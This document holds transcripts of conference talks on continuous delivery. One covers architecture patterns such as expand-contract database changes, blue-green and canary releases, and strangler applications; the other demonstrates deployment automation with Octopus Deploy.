upgrade. So we do that first again. We can also do that with the database. So Amazon, Facebook, Etsy, these companies are not deploying database schema changes a thousand times an hour. That's not happening. Etsy has database Thursday when they deploy their database schema changes. So what that means is in Facebook, there's one enormous production database and the developers do not get to choose what version of the database is running at the time their software is deployed. They have to defensively code against whatever version of the database happens to be there. And so what that forces you to do is make database changes incrementally using expand contract. So for example, say you're changing your address column to address line one and address line two. What do you do? Do you delete this column and add these new columns at the same time you do the deployment? No. What you do is first of all, you add the two new columns and you keep the old column there. And then what happens is, so you can do this before you deploy the app because this doesn't affect the existing application, right? We've just added some new database objects. That application is going to ignore those. They're set to default null, right? And then you deploy the new version of the application and the new version of the application will try and read from these columns. If they're null or the columns don't exist, then it will read from the old column. But it will always write to the new columns, yeah, the new columns, so and the old ones. So we write to all the columns, but reading, we try and read from the new ones and if we can't, we fall back to the old ones. And in this way, the application will lazily migrate the data. So the new version of the app will lazily migrate the data from here to here. But if we need to roll back the app, we've got the new data there. Rolling back the app doesn't require rolling back the database because the old version of the app can read the new data from the old data structure. And then much later, we can come back and delete the old columns if we want to. So that's the essence of Expand Contract. We expand, we add new stuff first, new database schema changes, new services, new static content. Then we deploy the new version of the app and then we come back and contract to remove the old stuff later. And again, that's expensive. You have to invest in that. What you're doing is you're adding complexity to your software in order to reduce the risk of deployments. It's a trade-off. It's not a silver bullet, it's a trade-off. And there's a fabulous book called Release It by Mike Nygaard where this pattern and a bunch of other patterns for creating resilient systems. It's a great book. So how about making changes to the application in an incremental way? How do we deploy the application in an incremental way? Well, we use a pattern called blue-green deployments. So what this means is, real story, I was working on a system in 2005 where we could only get one production set of hardware. We were not going to get another set of hardware because it was too expensive. And so we didn't have a staging environment. That was scary. So what we did is we created what we called a green environment, which was a new instance of Apache and WebLogic and a new green database, which sat on the same boxes, but they were installed on a different place in the file system and they listened on different ports. So what we did is we deployed the new version to our green environment. And then that's deployment. Release is just changing the router to point to the green environment ports. Rollback is changing the router back to point at the blue environment ports. So in this way, we were able to do deployment and the deployment took about an hour, but we were able to do roll forward and roll back in less than a second, super safely, by using this technique of separating out deployment and having two environments. And then when we deployed version 1.3, that would go into the blue environment and 1.4 would go into the green environment. So we did this by having multiple things on the same box. You can also do this in several other different ways. By virtualization, if you have two data centers, a main data center and a backup data center, your main data center is blue, your backup data center is green. So you've got your current version running in your main data center, you deploy the next version to your backup data center. And then release is switching DNS to point to the new data center or your load balancer. And then your backup data center becomes your main data center. Your main data center is now your backup data center and you've tested your business continuity process for free at the same time. And this brings us to a really important principle. Release and deployment are two different things. Deployment is taking a build and putting it into an environment. Release is making a feature available to users. And we normally achieve release through deployment. But they're actually two completely different things. Facebook's release manager, Chuck Rossi, has a video where he says all major features in Facebook are already in production. For the next, all features they're going to release in the next six months are already in production. You just can't see them yet. So they're deploying this stuff constantly into production, but it's not user-visible. They have a software called Gatekeeper that controls which users can see which features. And they can change that dynamically, which lets them roll a small feature experiment out, test it with a small set of their users, get feedback, iterate, and then when they're happy, then they roll it out to a larger and larger group of users. But we should be deploying all the time. Release is when we turn that knob up to 100. And that should be a boring, low-risk activity that the business can perform without even talking to IT. And it's low-risk because that software has already been in production for months. And we know that it works. And we've done all the testing on it in production before we actually release it to all the users. Another technique for reducing the risk of release is called canary releasing. And again, this is something that many large, high-performing organizations do. Facebook in particular, they have a cluster called A1, which is a few thousand boxes. New releases go out to that first. Facebook employees, when they go to facebook.com, they don't actually go to facebook.com, which is this big cluster. They're automatically re-rooted to this cluster, which is called inyour.facebook.com. So Facebook employees go to this. And so basically what they do, I mean, people call this dog-fooding, which is weird because who wants to eat dog food? So they call it drinking your own champagne. So they drink their own champagne. They test it here before it goes out here. And then if the build is good here, then it goes here, which is maybe a data center. And a very small set of users get sent to that. And then if it's good, then they send it out to the rest of the world. And so it's like a canary in a coal mine. In the old days, people used to take a canary into the coal mine. And the canary, if there was dangerous gas in the coal mine, the canary would die. And then everyone would run really fast out of the coal mine. And these days, they have chemical detectors, which means that no birds are killed, which is good. So no animals were harmed in the course of this presentation. So this is the canary. We make sure the software works here. And we're monitoring business metrics. We're not monitoring like CPU or disk space or IO. We're measuring how many users are actually sending messages through Facebook chat. How many people are actually posting onto their timeline measuring actual user activities? So if you're doing green field development, you can design with these patterns upfront. You can design for testability. You can architect for deployability. What happens, who here has an existing system that is definitely not designed for continuous delivery, but they want to get from A to B? Okay, many of you. So that's why I just want to spend 10 minutes on re-architecting. So I want to talk briefly about Amazon. Amazon in 2001 had a big ball of mud in production, a big monolithic app called Obidos. And in 2001, Jeff Bezos, the CEO of Amazon, sent a memo to his entire technical staff saying, we are going to re-architect around a service-oriented architecture. And this is before anyone was even talking about service-oriented architecture. And we're going to have a team for each service. So they invented this term, two pizza teams. So no team can be bigger than you can feed with two pizzas. Now, this is Seattle, so the pizzas are quite big. But still, that's about 10 to 12 people per team. So they re-architected the system so that every, they broke it into services. The service was maintained through its entire life by a team of people who was responsible for that particular service. And the rule is, you're not allowed to talk to another service's database. You have to talk to other services through their service layer, through their API. And they hired an US Army Ranger. And the job of the US Army Ranger was to go around the different teams, and if he saw someone talking to another service through the database, he would shout at them a lot. And if they carried on doing that, the rumor has it that you would get fired. So I'm not recommending people get fired, but rumor has it that that, you know, is a very serious offense not to actually go through the service layer when you're talking to other services. And so over the course of a few years, they did this. And so this is Werner Vogels, the CTO of Amazon. I'm going to put words into his mouth. I love doing this. So this is in 2006, 2007, I think. If you hear Amazon.com, the app calls more than 100 services to render the front page. Now, that causes, I mean, that is non-trivial, and it causes other problems, like trying to, if something goes wrong with that, how do you debug that when you've got 100 services collaborating to produce that problem? Well, you need to do really good monitoring of the way calls go through that graph of services. You need to do lots of caching to make that actually performant. But again, it scales. It's a horizontally scalable architecture that doesn't have a single point of failure. The reason they had to do this was because they kept scaling their single big database bigger and bigger until finally the UI couldn't handle it. So they had to re-architect around to create a reliable platform that based, sorry, a reliable service based on an unreliable platform that scaled horizontally. And that's the upshot of this. But, you know, how do we do this? I mean, and they did this in a somewhat incremental way. So there's still parts of Albedos that are live today, I'm told. I don't know if that's true. It's really hard to find out what's really going on at Amazon because they don't like to talk about it. So how do we do this incrementally? Well, there's a pattern called strangler applications. So if you've seen Tomb Raider, the film, okay, many of you. So lessons from Tomb Raider. If you've seen Tomb Raider, you would have seen this temple in Cambodia where there's this tree that's grown on top of the temple. And what's grown on top of the tree is there's a kind of a fig called a strangler fig. And the seeds are on the tree and the fig grows down and the fig grows up around the tree. And eventually the fig will strangle the tree. And all that's left is the fig vine that's grown up around it. So this is a metaphor for what you should be doing with architecture. I'm very happy that I was able to write our architectural lessons from Tomb Raider. Super. So customers, big ball of mud, big fat database. What we do is when new requirements come in, what we do is we find ways to implement those new requirements using a new module. So maybe this module serves just one particular web page as part of your whole site. And the stuff that needs to do that is in its own database. But everything else gets delegated through to the original app. So we delegate most of the stuff here and just this new page or even a new part of a page. So for example, Amazon, the recommendations engine is a service. And so the part of the page that the recommendations engine is done by this service. And maybe you have a new requirement for your website, we need recommendations. So you don't implement that in the existing system. You implement that as a new service. And maybe what we do is we have an include statement that pulls from this particular service to render that part of the page. But all new functionality, all new requirements you implement using new modules, new services that you build. And gradually over time, what you end up with is a bunch of new services. And eventually, finally, this thing gets strangled. We strangle the original application. So this is how we incrementally move from big monolithic ball of mud that's not suitable for continuous delivery to a new architecture that's service oriented that is designed for continuous delivery. And again, this happens incrementally over time. The problem is, you know, our organizations don't set up to do this. There's an annual budgeting cycle. We start a huge new project. Who's experienced the enormous rebuilds? You know, the big bang re-system re-architecture. We're going to re-architect everything from scratch. So hands up if that's actually worked for you. Yeah, I thought so. So yeah, someone who has worked for it, it does sometimes work. When that happens, I'm like, wow, you guys are really amazing. Or you have great senior management politicians to make it look like it worked even though it didn't. But starting a new project that's going to take a long time to make sure that it's definitely going to work this time. So it does sometimes work. It's very, very, very risky. And so what I saw, I mean, people object to this because they say, this is going to take too long. But my reply to this is it's better for the journey to take a long time and to arrive at the destination than for the journey to take a shorter amount of time but you never actually get there. So I want to talk about how we do this in the small. So this is big scale architectural change. How do we make smaller scale architectural changes, particularly on trunk? How do you change a particular module or service on trunk and make architectural changes? Well, this is a practical branch by abstraction. And what you do is this. We employ, there's a joke in computer science. There's no problem you can't solve with an additional layer of abstraction. So, or in direction. So what we do is we have a library we want to change or a component we want to change. What we do is we put an abstraction layer above it and make everything go through that. And then we incrementally move methods or API calls from one implementation to another one. So I used to work on a product called Go for release management. We changed the back end from Ibarthus to Hibernate and we changed the front end from Velocity to JRubion Rails and we carried on releasing the software during those two rearchitectures. So I just want to make sure I don't run out of time. I'm going to talk briefly about the front end. The abstraction layer was the servler API. We basically said if the URI had slash new, it would go through to JRubion Rails. Otherwise it went through to the old Velocity stack. Any new requirement that came in that added a new page or changed an existing page, we copied that page over to JRubion Rails. And then we did just that one page. And then what happened was when that page was ready, we changed the rest of the app to point to the slash new version here. But the rest of the app was still using Velocity. So there's no way as a user for you to tell if you are going through the Velocity stack or the JRubion Rails stack unless you looked at the URI. Same CSS, same HTML, but which stack it was being rendered through, you had no way of telling unless you looked at the URI to see which route it was going through. And so there's still some pages in Velocity right now. It's just that, so you can keep the old stuff for as long as you want. If you're a bit anal, you know, a bit OCD, then maybe you want to get rid of the old implementation eventually. And, you know, if you're really OCD, you might want to get rid of the interface as well. But it turns out you don't really need to do that. And again, as a trade-off, you're adding complexity in order to manage the ability to, this architectural cross-functional requirement of deployability. The final point I want to make is that continuous delivery, it's not about changing your architecture to do CD. Doing CD exerts a force on your architecture. Architecture is easy to change when you're starting work. When you're a long way into your work, it's hard to change. By continuously deploying throughout, you're constantly validating your architecture. By constantly doing performance testing, by constantly deploying, by constantly doing acceptance testing, what you're doing is creating a force on your architecture to make it testable, to make it deployable, and to make sure that we're actually meeting our cross-functional requirements so that we can find if there's a problem with our architecture early when it's cheap to fix, not late when it's expensive and painful to fix. So, Dan North has a pattern called Dancing Skeleton, which is based on Alistair Cobain's walking skeleton. And the idea is with a dancing skeleton, you know, you get a few features in production and test them with a realistic load and data set. And you actually have an API and make sure you can really exercise that. And that's why it's dancing, because you're really using it. And again, as I talked about, you're testing things like availability, security, disaster recovery, business continuity planning by having game days, actually creating real disasters to make sure that your software meets its cross-functional requirements. So the final take-aways, testability and deployability are architectural constraints. You need to architect with these things in mind. We want to be able to develop functionality on trunks so we can get fast feedback on whether what we're doing really actually works and whether the work we're doing actually produces meets our SLAs with the architecture we're using. You need to design for continuous deployment and incremental deployment. You can do rearchitecture and redesign in an incremental way as well. And the way to make sure that you're actually going to, your architecture is actually going to work and meet your cross-functional constraints is by doing continuous delivery, by actually practicing that thing all the time. That's how you verify it's really going to work. So we have four minutes for questions. What questions do you have? Yes? At the beginning you mentioned that you would be able to run your integration test on your development machine. How do you manage that when you have to be like Android on? Right. So any serious system, there's going to be like a bunch of different things and there's going to be the platform as a service, infrastructure it runs on, these other things. What you basically need to do is create mocks of those other services. So you should be able to mock out that service and you don't necessarily need to do it for every service because that becomes hard to maintain. But you find the big boundaries. So maybe you can stand up two of these services in your development machine at once and you just stand those things up. But then there's some other, so you group the services up and then stand up a group of them and then look at the other things and you create an abstraction layer between those things which is just good API design in any case and you create mocks of those things. And what you can do, there's a technique that you can use where you basically create a proxy and you stand up the whole system and record the messages and then you just store those and then you can stand up part of the system and you just use the recording of the messages, the can responses in order to be able to mock out the other systems. I mean, that's how you solve it if you have an existing system that you need to redesign. I mean, the other way you do it is just by making sure that you design the system so you can find 80% of the bugs without even having to talk to the other systems at all. So you just abstract that away. So if the other systems aren't there, my service will still work but with a degraded quality of service. So using patterns, Mike Nygaard has a pattern called circuit breaker which basically means if I can't contact the remote service, I will break the circuit for a certain period of time and my service will still carry on working but without that extra stuff that the external service brings you. So that's just good design is that I should be able to operate my service even if the other ones aren't there and so I should be able to do most of my testing with that being the case. And then for the small part of your functionality where that's not true, then we use mocks. Does that answer your question? Yes. So that's an excellent question. There's always some sharp person who spots that in the database part of BLEG green deployments. The question is, you know, if I do this, if I roll forward to version 1.2 and I need to roll back, there's new stuff in this database, right? What do I do about that? Well, the first thing you do is, I mean, maybe you don't care about that. You need to start with what's my recovery point objective? What's my recovery time objective? What are my actual SLAs around this? Maybe it's okay for me to lose the data. If that's true, that's super because you can just, I mean, literally what you do is before you deploy, you back up 1.1 database and you restore to the green 1.2 and you switch over. Then anything that happens between that and roll back, you just lose. That may be fine. If it's not, you can do things like putting the app into read-only modes for a certain period of time. If that's not acceptable, then you're going to have to use expand contract. So expand contract the whole point.
|
Continuous delivery can be considered a cross-functional requirement, rather like testability and maintainability. In the first part of this talk I'll explore the implications of continuous delivery for your systems architecture. The second part will present patterns that successful organizations have used to enable continuous delivery. In the final part, I'll discuss the architectural and organizational obstacles presented by by typical legacy "big ball of mud" systems, and what can be done to incrementally move away from them.
|
10.5446/51435 (DOI)
|
So, let's see here. To get started today, here's the things we're going to cover. What is continuous delivery? Why is it important? How can you do it wrong and how can you do it right? But before we start with that, let me tell you a little bit about myself. I have been delivering software for about seven years now and I've been doing it perfectly ever since I started. No, that's not true at all. I've been delivering software well for maybe 18 months and today I'd like to share with you some lessons I've learned on the way to get to doing it well out of a lot of failure from the past. So for starters, how many people here are practicing agile in your shop today? Okay, pretty much all of you. And how many people are practicing continuous delivery? Much smaller portion. Okay, that's what I see when I talk to people a lot and what I want to tell you about today is why is continuous delivery one of the most important parts of agile? So let's start with what is continuous delivery? This is my definition of continuous delivery. delivering working tested software to your users as frequently as is practical. Notice I didn't say possible, I said practical because while it may be possible for you to deliver software every single time you commit, that may not be practical for your users. Why is continuous delivery an important part of agile? If we look at a couple of quotes of some of the principles that were defined by the original team who defined the agile manifesto, you can see that they had continuous delivery in mind. That they saw that just because you're developing quickly with a short feedback cycle doesn't mean that you can just sit on your software for six months before you deliver it to your users. One of the main tenets of agile is to deliver business value to your users and you can't do that if you're on a nine month delivery cycle without your end user seeing your software. So frankly if you are delivering software, if you're developing in nice short agile two week or four week sprints but you're only delivering every quarter or every twice a year, you're kind of trolling your users. That's this guy. He develops in two weeks sprints but he delivers to production quarterly. So what does that mean? Why is that trolling your users? Let's say it's in production. You say great, we're going to get that fixed in the very next sprint. So you go out and you write the code and you fix that bug. Awesome. Hey, we're going to put it in the bug tracking system. It's fixed and the user sees that and says great, my problem is going to be solved now. Awesome. When am I going to see that? And you say oh, in about six months when we do the next production release. Sorry. That's exactly why Continuous Delivery is one of the most important tenants of agile. You've got to deliver that business value and if your code is not being shipped to an environment where your user can actually make use of it, they're not really gaining value from it. Let me pull up. So today we're going to look at, one other point I wanted to make before we move on, let's go back, is let me tell you how agile worked in an organization I was at before. We started practicing agile development in two weeks sprints and so we would, you know, there was this nice big front loaded process where they would go out and do a big huge requirements gathering session over a month or so and build out a big nice requirements document. And then we as the dev team said oh, well we're agile so we're going to take that requirements document and we're going to decompose it into a backlog of user stories and we're going to iterate on it every two weeks. And then at the end of this three or six month project of us iterating every two weeks, we're going to go ahead and ship that software to you. That wasn't really agile. That's what I like to call the scrumber fall. You know, you're practicing a version of scrum inside of the waterfall and you haven't really implemented agile at that point. Agile is one of those things that you've really got to have buy in from your entire business unit that they understand what you're doing and why you're doing it and that it is different from what they've done before and that can be a hard sell. But in my experience, getting them through to the continuous delivery piece really kind of helps sell it because all of a sudden they start to say oh, I'm going to have so much visibility into what you're doing by seeing the code you write every two weeks. That's awesome or every month if that's why you do your sprints. That's great and they're going to get to give feedback and once you get through those first couple of cycles, they're going to see the value in doing this type of iterative development and continuous delivery is the part that makes that possible. So today we're going to look at an app that has some complexity and the reason we're going to look at that is because I've been to some talks on continuous delivery before and I've seen somebody get up here on stage and go all right, cool, here we go, file new MVC app and here's how you can deploy it quickly. And I was like that's awesome. I got done with the conference and I went back to my job and I opened up my Visual Studio solution which had 69 projects in it including some seven deployable web apps, a couple of Windows services, three or four one off console apps that have to run as a scheduled task, production database, a reporting database schema and I went oh, well they didn't show me how to deal with all of this. It was just one thing. It looked real simple. Now all of a sudden I've got this complex real world application that I've got to deploy and I don't know how to make that happen. So part of what I want to show you today is a set of tools that I found that helped me deliver complex real world applications. So this is an application that is not truly complex. It's complex for the sake of complexity just so we can demonstrate it. But it's going to consist of a front end web app that's kind of a catalog style app for buying phones or something like that. An API that drives the front end so the front end grabs all of its data from a back end API. That's another deployable piece. Maybe on a whole separate tier. There's going to be obviously maybe a service bus for some messaging back and forth. Definitely going to be a database in there. Some scheduled tasks, a Windows service that handles doing some sending emails and such. One of these apps actually work. Just FYI, I didn't go so far as to build a hugely complex app just for the heck of it. But I did build the shell of these apps to represent something similar to what I was seeing in real world applications. So we'll want to look today at a couple of tools that I've used to automate my process and get deployment going. But first I want to take you through some of the stumbling blocks that I went through in trying to get to a state of deployment in Nirvana. There's a lot of wrong ways to try to do continuous delivery. I didn't know that until I tried pretty much all of them. That brought a lot of pain. A lot of 4 AM, oh my gosh, rollbacks from production because something didn't go right. These are all lessons that were learned deep in the trenches of deployment in real world applications where you can't fail. You have to succeed or you have to successfully roll it back to something that your users can use because the next day business starts. So we've got some of the ways that I tried to build continuous delivery systems or practice continuous delivery without a system started out with a lot of batch files, a lot of manual deployments, a lot of really painful, not repeatable processes. It helped me develop a sense of what a good continuous delivery system should look like. It should have the following components. It should be, number one, highly automated. Automate everything you can. If you can automate your code deployments, your database deployments, if you can automate your infrastructure setup, there's going to be some good talks on that here today, that's going to make your life a whole lot easier because you're going to have a nice consistent environment and you're going to have a process that doesn't require somebody to remember all the steps or have it documented and follow it. It's completely automated so they can click a button and do it. The process should be very repeatable. I should be able to repeat a deployment into any one of my environments and know that I'm going to get the right results when I do it. Ideally it should be traceable. It should have some sort of visibility and transparency into what happened, what bits got deployed, who deployed them, when and where did they deploy them to so that if there is a problem, you know who you got to go talk to to get it fixed. Let's look at some examples of some of the wrong ways to do continuous delivery. Like I said before, the manual way. This involves maybe a developer fires up his Visual Studio and right clicks and says publish and selects the deployment target of the production servers and clicks go and hopefully I remembered to put it into release mode instead of debug mode so it will have the right config transforms. Maybe you have logged it in a spreadsheet somewhere so somebody else would know that you actually did a deployment rather than just say hey, the website suddenly broke in. What happened? Oh, I did a deployment. Did I not do it right? You know, this is obviously not going to be consistent, not going to be repeatable by any means and it's not traceable. So you take a step up and you go cool, let's write a batch file that does this. That's a step in the right direction. It's a little bit more repeatable. You might build some logging into it so it's kind of traceable and it's slightly more consistent although now you've got probably a bunch of stuff like hard coded network file share paths on production or hard coded IPs of database servers or there's a lot of stuff in there and you still haven't necessarily made a consistent build process so you don't know what you're going to be deploying. You don't know that it's built correctly and that all the tests have been run and passed. So you don't really have the kind of traceability you're looking for there. So what that has led me to do is find, I found a tool called Octopus deploy that helps manage your automation of your deployment environment. And this is the Octopus way of deploying things. They support the concept of build once and deploy everywhere. So that means that the exact same binaries that got built and deployed to the dev environment and that got built and deployed to the staging environment and the production environment and that way whenever you have testing around this and your QA department signs off a particular version you know those exact same binaries went to each version. Not that some developer accidentally built the wrong commit or built off the wrong branch and oh whoops even though it got signed off in QA I built the production release from my local feature branch so it's all broken. It incurs, it creates this process that is repeatable. It's extremely automated because all you have to do is click a button and everything happens and it's got a lot of traceability and logging built right in. So let's stop and take a quick look at what Octopus deploy looks like and how powerful it can be. Just bear with me a second here. Okay. All right. So this is our Octopus deploy dashboard. All right, all of a sudden right now I have a very nice glimpse into all my applications of which I only have one. I could have a lot up there. I could have multiple projects in groups. This shows me I know exactly which version has been deployed to development, which version is in test and which version is out in production currently. Obviously you can see here we've done some work, we've deployed some new stuff to the development environment and have kind of you know the developers have hacked away on it a little bit and they feel good about it. But now it's ready to go to QA and user acceptance testing. Well, this is how we do this with Octopus. I can just click on that release that I did there. Sorry, these virtual machines are a little bit slow. There we go. And I can say okay cool. Here's the steps that were followed. Here's exactly what this tool performed on my behalf that I configured to deploy to development. Let's just promote that. Okay. So we'll promote it to UAT and we'll force the packages to be reinstalled for fun and click deploy and it's going to go off and do it. The exact same binaries that I already built and tested in dev is what's going to get pushed out to my UAT environment and the only things that are going to change is a little bit of configuration. We'll get into that in a little bit. And as you can see, here we go, we just checked off complete. I just did a staging deployment right there. That's simple. And now if I go back to my dashboard, I can see great. Version 1.0.34 is now in UAT. Our QA team is going to work on it. We're showing it to users. We're getting user feedback for our next sprint. And if they sign it all off, we're going to push it right out to production. So this dashboard becomes a nice information radiator to your whole team, your dev team, your ops team, your QA team. You can put this up on a, you know, a shared screen somewhere on a wall so anybody always knows, hey, I can see exactly what version is there and what version I can expect to find in each environment. And if we've done, hey, did you guys do that production deployment yet? Well, go look at the board. Nope, we sure didn't. Now all that information is here and accessible. So let's, sorry, it's bouncing. It's going to be a little bit painful. Okay. So we did our demo. So what kind of things can you deploy with Octopus? I mean, if it's, you know, a somewhat opinionated deployment system, what kind of things have they built in support for? Well, pretty much everything. You can deploy a website to IIS. You can deploy your Windows services, your scheduled tasks. You can do all kinds of deployments to Windows Azure with websites via a Git deployment or an FTP deployment. You can push out packages to an FTP or an FTPS server. You can push out cloud deployment packages to Windows Azure and have some nice options there to say, hey, keep my scaling that I set in the cloud or reset my scaling to what's in the package. And you know, with the new MSDN, Windows Azure usage rules, you can make a lot of nice use out of that. But basically it can really deploy just about anything. The way Octopus works is it uses NuGet packages for deployment. So you simply take each component of your application, you package it up as a NuGet package, put a little deployment script in there, tell Octopus where to find it, and it says, okay, great. I'll start reading it and looking for my versions from that server and deploying those packages based on a set of conventions and rules. But the NuGet packaging format, it doesn't really look like a regular NuGet package like you might be used to in Visual Studio. All it's really used it as is a nice zip container with some metadata that describes the versioning and content of the package. Other than that, it's basically just your application sitting in a NuGet package. So the deployment scripts I mentioned are all written in PowerShell. So you've got the full.NET runtime at your disposal pretty much with PowerShell. Anything you can do in PowerShell, you can do in your deployment script in Octopus. It looks for a set of predefined package or deployment scripts that you see here and it actually looks for them in this order. So it'll run, you know, once it takes and unzips your package, it will say, okay, great. Now if I unzip this NuGet package that you told me about, I'm going to look and see if there's a pre-deploy.ps1 file and if so, I'm going to execute it. So if you need to do something like, I don't know, shut down a worker process on a website or, you know, have a particular package shut down a load balancer, you know, and say, hey, take me out of load balancing before you actually run the deployment, you can do that in a pre-deploy. A deploy.ps1 is what's going to execute to actually perform your deployment. Now some of the stuff is kind of auto-magical with Octopus. You get website deployment for free. If it is a, if Octopus finds a web.config in your package, it says, hey, I assume you're talking about a website here. I'm going to go to IIS, look for a website with the same name as the package or one that you configure and go ahead and update it. It actually does a pretty nice version of that that supports, that helps support a rollback concept whereby all it does is it deploys each version of your application into a new folder with that versioning number. And then it just repoints your IIS website at that folder. And that way if something is wrong and you absolutely have to roll back, you can just go point IIS back at the old version and everything's back to how it was. So, and in that case, you don't even need any deployment scripts at all. If it's a website, it'll just deploy it. And if you're deploying something a little more difficult to deploy like a Windows service or say something that needs to run as a scheduled task, you're going to need to write some deployment scripts for that. And there's some examples on the Octopus deploy website that kind of show you some things. And I'll show you one today that can deploy a Windows service. So let's look at it. All right. So we're back in our friendly demo machine over here. And we're going to jump right over here to Visual Studio and look at a deployment script. So we'll look at our, let's see, about our mailer. No, not the mailer. The service bus. The service bus runs as a Windows service. Maybe it's a WCF server hosting in service bus or something. Whatever it happens to be, you need to deploy Windows service. So here I've got a deploy.ps1 script that, oops, there we go. Come on. All right. Sorry, that zoom did not work very well. So we'll just walk you through it. The deploy.ps1 script here, that's going to be hard to see because it won't let me scroll on this Mac in a Windows virtual machine. Yay. Is, let me try this one more time. There we go. Okay. So here, this is a script that I took right off the Rock2Defoil website and just kind of customized a little bit to fit my needs. And it's going through here, as you can see, and it's using sc.exe in order to actually deploy the service. So we're using standard PowerShell features like get service, define the service name. This is all basically, none of this stuff is really that specific to Octopus. This is just how you would write a PowerShell script to deploy a Windows service. And if you've already written some PowerShell scripts to handle some of your deployment, Octopus is going to be a great fit for you because you can convert it right into an Octopus deployment script. As you can see here, it just goes through and says, great, here's the service, here's the path, and let's execute it. And we'll get into some of these variables a little bit later on because they get pretty powerful with Octopus and really help you modularize the way your scripts are written in order to handle a deployment. Actually, since we have to keep bouncing back and forth, let's just get into variables right now so we don't have to switch back to the slide deck. So the variables in Octopus are defined in the Octopus portal right over here. In your actual project, at your project level, you can come in here and click variables and define a set of variables that will be available in your project. The variables can be scoped to a particular environment, which is great for something like connection strings. So I can define a connection string variable and then say, okay, well, for development, it's this connection string, but for UAT, it's here and production, it's here. Another nice thing about this is that now you don't have to have this in a config file transform that developers have access to with your production connection string checked into source control. And you also don't have to remember to manually replace them. This can be defined in here, and you can set permissions around who can view these variables and keep it so that only the people who have the, who have the, who need access to particular variable values like a production connection string can see them or edit them. As you can see, I can also develop, Octopus has what they call a set of roles for each machine. And so I can say, okay, this machine is a front end web server. This machine is a database server. And whenever I tell it to deploy a package, I'm going to tell it, all right, great. Go ahead and deploy this to all my front end web servers or deploy this to all my API servers. And you can scope your variables according to those same roles. You can also scope a variable down to just a very specific step as I've done here with the service bus. So with, so you might be asking, all right, so what is a step? That seems to be the real, you know, nuts and bolts of this deployment stuff. And the steps, as you'll see here, are the NuGet packages that you have created for your apps. Whenever you define a step, you can then add it to a project as, hey, go deploy the catalog app, go deploy the API. And there are other types of steps that are not necessarily package steps, but also you can have it send an email, you have approval steps, which is great for authorization workflows. I can define, as I have in this project, a approval required step that says, all right, this is a manual step. And only people from the specified group that I've defined an octopus have permission to let this step proceed. And I can even scope that to environments. So in this project, I've put this manual approval step that is required for production only. So anyone can deploy to development and user acceptance, but only a certain group of people can deploy to production. And whenever it hits that step, it's going to stop, it's going to pause the deployment and say, hey, one of these people has to come here and click this button. So that way you get some, not only your traceability, but you have a nice authorization workflow into who can actually promote releases into specific environments. And as a developer, you should love that because it's kind of a safety net. If you're not authorized to deploy into production and they set your process up correctly, you can't shoot yourself in the foot by accidentally deploying to production. It'll stop before it happens. Now in addition to the variables and config transforms, I'll show you something else when I edit this catalog app that you can define, which is your config transforms. So right now, you may have, especially if you're developing ASP.net websites, you may have a lot of web.config and web.debug and web.release and web.production.config files that hold all of your transforms. Octopus has full support for all those. And it will automatically deploy and run your star.release.config. It doesn't work just for web.config. It also supports basically anything that ends in a.config file name. It will look at it and say, hey, do I need to apply these XML transforms to one of your, you know, correspondingly named configs? That will always run star.release.config for every deployment. So if there's something that needs to happen on every single deployment you do, like, you know, remove the compilation debug attribute, then you can put that in your web.release.config and it'll get run for every deployment in every environment. And then after it runs that, it will come through and look for a file called something like web.production.config or web.uat. It's going to substitute in the environment name in order to actually figure out which files need to be run. Once it gets done doing your XML config transforms, it will then take anything you've defined in the variables and try to substitute in for connection strings and app settings. So if you've defined an octopus variable with the same name as your main connection string, then after all your other config transforms have run, it's going to go ahead and try to substitute that out with the value you've specified in the portal. The, and it's also going to do that not just with connection strings but also with the app settings element. So if you've defined a bunch of app settings in there, you really don't have to keep those in config transforms anymore. You can keep them all in the octopus portal. The things that I tend to keep in the web.config or whatever transforms are, say, if you're using the Windows Identity Foundation and you've got to have one of those Microsoft dot identity big XML things transformed for each one of your environments, that octopus can't do for you. So you're going to keep that in your web.production.config and store that with your source control and it will go ahead and apply that for you whenever you deploy to production. And you can also, as you see down here with the additional transforms, I can also define any comma, you know, comma separated list of any files I want it to apply transforms from. So for some reason you don't call yours web.production.config, you call it, you know, mysuperawesome.xml config. Great, you can define that here and it will still try to treat it like a config file. Now, the, oh, sorry. So that's how we can define XML transformations and then on the variables, you know, I mentioned before that it would try to substitute those in for your app settings or your config values. Well, the other thing it will do, as you saw kind of a preview in the deploy dot PS1 file we looked at, is it makes those variables available to your PowerShell scripts. It makes them available as environment variables, I believe, and also in your MS build files. So if you have a, if you've already got a nice big MS build file that you wrote for TeamCity that does stuff, you can still, you can start accessing TeamCity, I'm sorry, Octopus deploy variables that you define in that MS build script to help substitute in things like the path to which it is currently deploying your code, the environment to where it's being deployed, the, basically any other thing, it has a whole, there's a whole set of standard Octopus variables to get made available such as the current version you're deploying, the name of the package, what environment you're deploying to, what machine you're employing to, the path on that machine. So you can take that and do a lot of really powerful stuff with it in your PowerShell scripts or MS build files. And we've already kind of taken a look at that, but I'll show you one more, a little more interesting one. Oops. Come on. All right. If we look at our, no, not our mailer. Oh, all right, I guess this version of the project does not have one. Well, anyway, one of the interesting things I had, one of the interesting tasks I had to take on in deploying my own code was to set up scheduled tasks, which can be done with PowerShell, you know, so I wrote a nice big complicated PowerShell file to do that and just substituted in my Octopus deploy variables in order to know which environment it was and to name my, you know, since I had some environments that existed on the same machine, I would make sure that, you know, it used the environment name, prepended on to the app name in order to actually differentiate which versions of the code was running. So now, let's actually take a look at the environments. You're going to see we have a pretty boring and bland environments page here because I've only got so many virtual machines that can run on a laptop. But this kind of demonstrates how you would actually define what your physical environment looks like to Octopus. So you can say, great, I've got, you know, these 20 machines that are part of my production environment and you can assign your specific roles to them so that you know exactly which versions, you know, which machines are going to actually, are going to get deployed to whenever you kick off a deployment to a particular environment. So currently, the Octopus uses a nice secure communication stack that uses client certificates on both the server and on the what they call tentacle machines in each environment that encrypts all communications between it. So you can, so you don't have to worry if some of your machines are sitting out in the cloud and you've got to reach out to them from behind the firewall, that's going to be done securely. None of your, you know, production connection strings or anything like that are going to get transmitted out across the wire unsecurely. Currently Octopus deploy uses a push-based deployment model. So you install a Windows service on the tentacle machines that, and open up a port by default, it's like 10, 9, 300 or something, but that's configurable. And the Octopus server actually reaches out to each tentacle and says, hey, it's time for you to deploy this code and it sends the NuGet packages and all the variable data down to the server across that secure communication channel and kicks it off into work. There have been some people who say, hey, my Octopus server is here, my other servers are over here behind a firewall and the network admins are not letting me poke a hole in that firewall. With 2.0, that's going to be coming out later this summer, Octopus deploy is going to enable actually, I'm sorry, actually I believe with 1.6, maybe in this version, yes. In 1.6, they've actually enabled a pull-based deployment where the tentacles can reach out 